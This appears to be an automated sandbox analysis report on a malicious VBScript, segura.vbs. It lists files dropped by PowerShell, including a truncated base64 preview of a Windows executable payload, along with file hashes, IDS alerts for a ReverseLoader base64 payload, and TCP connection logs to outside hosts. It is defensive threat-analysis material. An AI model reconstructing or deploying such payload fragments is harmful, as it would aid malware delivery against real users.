                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:NlllulN7rlz:NllU
                                                                              MD5:60800FE3EBA2CA09118A33A34BF00BD8
                                                                              SHA1:4DBA1472443F1B047803693393F61A2182695D2A
                                                                              SHA-256:D85FCEE5CD239F2EE739F27980E9EBB1BE0573405BC7C004DB4E828D1A2D50A0
                                                                              SHA-512:AFD4B6861BD4A06C23FEC68375FD4B012E8A456ED8EEF708B3F50C6FCD40D7B599B9967EDCFF9E917F9B8BF567ED2B6C5B7EE83AA2F6965A6D02BB1DABB9010F
                                                                              Malicious:false
                                                                              Preview:@...e................................................@..........

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sd05jbx.bdx.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gipfh2fl.tdq.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odre4mri.dtu.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prgm5mdh.qdj.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwj2qmca.bxs.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcnnvqu5.vne.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\dll01.txt

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):82604
                                                                              Entropy (8bit):4.933268783138117
                                                                              Encrypted:false
                                                                              SSDEEP:1536:yxkG9DytusrHiJZM2FeBZ0YNIIIlNsDf50jguaPCcl7wh6V8xPOr:M59Dpeir8ZRNIItzu4z7s+Br
                                                                              MD5:E177873E2D842F08553C449F4758A4CE
                                                                              SHA1:91612A3524924E253495CBF1DD05AEFDFB118FFC
                                                                              SHA-256:970E00FFC2819C1F2D6FBE0C13E115B101F28108813B04ACFEE162043648E0EA
                                                                              SHA-512:2F38AC3FD5C68297DEA3538C74E327850F6CEC6C28326DA34FCD4AE7FCDD6D26DFE337498C5D44438006A231CDBA86DBB605F2CE3F8A66142600E50F13B447FC
                                                                              Malicious:false
                                                                              Preview:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPyfIWcAAAAAAAAAAOAAIiALAVAAAOoAAAAGAAAAAAAATgkBAAAgAAAAAAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAABgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPgIAQBTAAAAACABAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVOkAAAAgAAAA6gAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAAAEAAAAIAEAAAQAAADsAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAEABAAACAAAA8AAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwCQEAAAAAAEgAAAACAAUATKcAAKxhAAABAAAAAAAAAHSaAADYDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqJgACKAQAAAoAKgAAEzAEACwAAAABAAARIAU3UAAoBgAACm8HAAAK0AQAAAIoCAAACm8JAAAKKAoAAAoUFCjpAAAGJioTMAQAMAAAAAEAABEgyjRQACgGAAAKbwcAAArQBAAAAigIAAAKbwkAAAooCgAAChQUKOkAAAZ0AwAAAioTMAQAMAAAAAEAABEgsDRQACgGAAAK

                                                                              Static File Info

                                                                              General

                                                                              File type:Unicode text, UTF-16, little-endian text, with very long lines (302), with CRLF line terminators
                                                                              Entropy (8bit):3.570894635254417
                                                                              TrID:
                                                                              • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                              • MP3 audio (1001/1) 33.33%
                                                                              File name:segura.vbs
                                                                              File size:15'017'006 bytes
                                                                              MD5:5fa27882d49b1bcf021faca879f41ecb
                                                                              SHA1:bba7da6693438f19e241ccc82627227f74e53d3c
                                                                              SHA256:bef0af387fe44cd78c261d4374ca93e940ed0ef55e7055d4a9fd5246a4913768
                                                                              SHA512:2e0eeca91c178d641a7992f5f76683f00fac2a418881ad5291405bf0bd4013361bc099a7bcb68b0bfc8e667ce48dd6e7810b093502ab6165c924a293e01e7ade
                                                                              SSDEEP:1536:lyyyyyyyyyyyyyyyyyyyyyyyryyyyyyyyyyyyyyyyyyyyyyycyyyyyyyyyyyyyyl:nZ5+
                                                                              TLSH:C7E60113A359FF31DF06787734D33FA34615A7BA189C589C60E9922828C59A24BC17FE
                                                                              File Content Preview:..........'. .4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4

                                                                              File Icon

                                                                              Icon Hash:68d69b8f86ab9a86

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-31T07:43:17.021310+01002020423ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound1162.159.135.233443192.168.2.649756TCP
                                                                              2024-10-31T07:43:17.021310+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21162.159.135.233443192.168.2.649756TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 31, 2024 07:43:03.526540041 CET49709443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:03.526653051 CET44349709104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:03.526722908 CET49709443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:03.535675049 CET49709443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:03.535717010 CET44349709104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:04.149902105 CET44349709104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:04.150019884 CET49709443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:04.153285027 CET49709443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:04.153315067 CET44349709104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:04.153620005 CET44349709104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:04.164026976 CET49709443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:04.211355925 CET44349709104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:04.296853065 CET44349709104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:04.296953917 CET44349709104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:04.297013998 CET49709443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:04.344734907 CET49709443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:08.341789007 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:08.341831923 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:08.341896057 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:08.356633902 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:08.356658936 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.236824989 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.236972094 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:09.238836050 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:09.238845110 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.239082098 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.244645119 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:09.287338018 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.775635958 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.775701046 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.775743961 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.775793076 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:09.775800943 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.775819063 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:09.775892973 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:09.776700020 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.776784897 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.776854038 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:09.776854038 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:09.776860952 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.826729059 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:09.899200916 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.899225950 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.899311066 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:09.899322033 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:09.899463892 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:10.022229910 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:10.022248983 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:10.022321939 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:10.022321939 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:10.022332907 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:10.022397995 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:10.023288012 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:10.023307085 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:10.023390055 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:10.023401976 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:10.023458958 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:10.023463964 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:10.023499966 CET44349712164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:10.023580074 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:10.041522980 CET49712443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:12.638550997 CET49738443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:12.638576031 CET44349738104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:12.638689995 CET49738443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:12.638931990 CET49738443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:12.638945103 CET44349738104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:13.251982927 CET44349738104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:13.263092041 CET49738443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:13.263101101 CET44349738104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:13.403878927 CET44349738104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:13.404151917 CET44349738104.20.3.235192.168.2.6
                                                                              Oct 31, 2024 07:43:13.404237032 CET49738443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:13.406111956 CET49738443192.168.2.6104.20.3.235
                                                                              Oct 31, 2024 07:43:13.406981945 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:13.406997919 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:13.407064915 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:13.407291889 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:13.407305002 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.285310030 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.285406113 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.286761045 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.286770105 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.287555933 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.288259983 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.331326008 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.845779896 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.845839024 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.845881939 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.845918894 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.845935106 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.845954895 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.845988989 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.847042084 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.847117901 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.847127914 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.847146034 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.847182989 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.889117956 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.968588114 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.968702078 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.968743086 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.968754053 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:14.968789101 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:14.968811035 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.089977026 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.090023994 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.090059042 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.090065956 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.090095043 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.090114117 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.091408014 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.091451883 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.091483116 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.091490030 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.091511965 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.091527939 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.212538958 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.212590933 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.212655067 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.212662935 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.212696075 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.212716103 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.213515043 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.213560104 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.213589907 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.213596106 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.213627100 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.213633060 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.334801912 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.334825993 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.334887028 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.334896088 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.334922075 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.334943056 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.381124973 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.381170988 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.381215096 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.381225109 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.381261110 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.381287098 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.458806992 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.458853960 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.458904982 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.458914042 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.458940029 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.458962917 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.578223944 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.578291893 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.578362942 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.578382969 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.578418970 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.578454018 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.579576015 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.579623938 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.579668999 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.579675913 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.579705954 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.579724073 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.701590061 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.701643944 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.701708078 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.701720953 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.701777935 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.702732086 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.702792883 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.702816963 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.702824116 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.702853918 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.702863932 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.821927071 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.821958065 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.822012901 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.822025061 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.822061062 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.822109938 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.823579073 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.823601007 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.823677063 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.823678017 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.823685884 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.823736906 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.868916035 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.869067907 CET44349744164.132.58.105192.168.2.6
                                                                              Oct 31, 2024 07:43:15.869091034 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.869122028 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.869354010 CET49744443192.168.2.6164.132.58.105
                                                                              Oct 31, 2024 07:43:15.881968975 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:15.881994963 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:15.882052898 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:15.890605927 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:15.890618086 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.508239031 CET44349756162.159.135.233192.168.2.6
